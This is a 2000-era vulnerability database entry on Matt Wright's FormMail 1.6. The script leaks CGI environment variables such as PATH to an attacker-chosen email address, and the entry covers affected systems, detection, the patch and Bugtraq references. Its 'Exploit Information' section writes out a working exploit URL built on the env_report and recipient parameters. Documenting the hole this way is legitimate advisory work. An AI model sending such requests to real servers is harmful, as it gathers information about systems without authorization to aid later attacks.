FormMailExec

Vulnerability Description

Brief description: An unauthorized remote user is capable of obtaining CGI environmental variable information from a web server running Matt Wright's FormMail by requesting a specially formed URL that specifies the email address to send the details to.

Full description: CGI environment variables may be accessed remotely by specifying a particular CGI environmental variable such as PATH, DOCUMENT_ROOT, SERVER_PORT in the specially formed URL which will email the results to the address given. The information obtained could possibly be used to assist in a future attack.

Components: Matt Wright FormMail 1.6 (trusted)

Systems: Sun SunOS 4.1.4 (trusted), Sun Solaris 8.0 (trusted), SGI IRIX 6.5.6 (trusted), SCO Unixware 7.1.1 (trusted), OpenBSD OpenBSD 2.6 (trusted), NetBSD NetBSD 1.3.3 (trusted), Linux kernel 2.3.x (trusted), Linux kernel 2.2.x, RedHat Linux 6.2 sparc (trusted), RedHat Linux 6.2 i386 (trusted), RedHat Linux 6.2 alpha (trusted), IBM AIX 4.3.2 (trusted), HP HP-UX 11.4 (trusted), FreeBSD FreeBSD 5.0 (trusted), Digital (Compaq) TRU64/DIGITAL UNIX 4.0f (trusted)

Effect(s) of exploiting: Environment variables are exposed.

Detecting the hole:

    1. If FormMail v1.6 is on the system, the vulnerability exists.

Fixing the hole:

    1. Apply Peter W's patch

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: can-2000-0411 -- Matt Wright's FormMail CGI script allows remote attackers to obtain environmental variables via the env_report parameter.

Exploit Information

Attack: Request the following URL from the target's server: 

http://target.host/cgibin/formmail.cgi?env_report=PATH&recipient=<email address>&required=&firstname=&lastname=&email=&message=&Submit=<message>
This URL request assumes that the formmail.cgi script is located in the cgibin directory.

Related Information

Advisories: See the posting to Bugtraq ; BugTraq ID 1187 (from which the above analysis came); Black Watch Labs Vulnerability Alert ; and the X-Force entry XF:http-cgi-formmail-environment

Related Vulnerabilities:

Reportage

Reporting: Vulnerability originally posted to Bugtraq on May 10, 2000 by Black Watch Labs. in BugTraq mailing list, message ID 3919EC9B.2347576C@perfectotech.com (Wed May 10 2000 01:11:23 )

Revision Number 1

  1. Homer Briggs (6/26/2000):
    Created entry